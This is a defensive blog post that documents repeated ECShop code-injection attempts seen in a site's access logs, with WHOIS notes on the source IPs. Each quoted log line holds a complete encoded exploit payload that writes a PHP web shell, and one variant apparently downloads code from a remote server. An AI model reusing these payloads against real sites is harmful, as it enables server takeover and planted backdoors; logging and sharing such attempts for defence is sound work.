Tag Archives: IP numbers

106.12.54.95 – Code Injection Attempt

Recently I’ve been examining access.log files at Freefixer.com in order to block unnecessary bots and bad behaviour. The follow log entry from 106.12.54.95 caught my attention since it looked pretty suspicious. At first glance it appeared to be an attempt to inject SQL code:

106.12.54.95 - - [29/Aug/2019:00:53:55 -0700] "GET /user.php?act=login HTTP/1.1" 404 4695 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

After some further searching I found a software tool called CMS-Hunter that scans for vulnerabilities in many common content management systems. In this case the exploit is for ECShop and it seems to be a PHP code injection exploit. Most likely, the user behind 106.12.54.95 is using CMS-Hunter.

106.12.54.95 is owned by China Beijing Beijing Baidu Netcom Science And Technology Co. Ltd. They own the following IP range: 106.12.0.0 – 106.13.255.255.

I’ve also noticed the same behaviour from 112.114.100.146, Yunnan China:

112.114.100.146 - - [31/Aug/2019:10:57:11 -0700] "GET /user.php?act=login HTTP/1.1" 404 413 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

The same thing is also happening from 112.114.103.183, Yunnan China:

112.114.103.183 - - [03/Sep/2019:00:41:00 -0700] "GET /user.php?act=login HTTP/1.1" 404 4222 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update September 6, 2019: Same type of traffic from 103.216.154.138, Beijing China:

103.216.154.138 - - [05/Sep/2019:16:01:51 -0700] "GET /user.php?act=login HTTP/1.1" 404 413 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update 9 Sep 2019: The same type of requests are now coming from 112.114.107.49:

112.114.107.49 - - [06/Sep/2019:09:56:17 -0700] "GET /user.php?act=login HTTP/1.1" 404 4220 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update 19 Sep 2019: Same type of hacking attempt from 14.116.38.119.  The whois reports “China Zhuhai Chinanet Guangdong Province Network” as the owner of this IP.

14.116.38.119 - - [19/Sep/2019:21:03:32 -0700] "GET /user.php?act=login HTTP/1.1" 404 3708 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:372:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b246161616161616161275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a323875634768774a79776e623273354f4455774d6963755a6d6c735a56396e5a585266593239756447567564484d6f4a326830644841364c7938784f5449754d5467324c6a45314c6a497a4f6a6b344c3252354c6d70775a7963704b54733d2729293b2f2f7d,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"

Update 20 Sep 2019: Another hacking attempt, and this time from 114.116.251.212. China Beijing Huawei Public Cloud Service and Huawei Cloud Service data center shows up in the WHOIS results.

114.116.251.212 - - [20/Sep/2019:01:21:22 -0700] "GET /user.php?act=login HTTP/1.1" 404 4221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"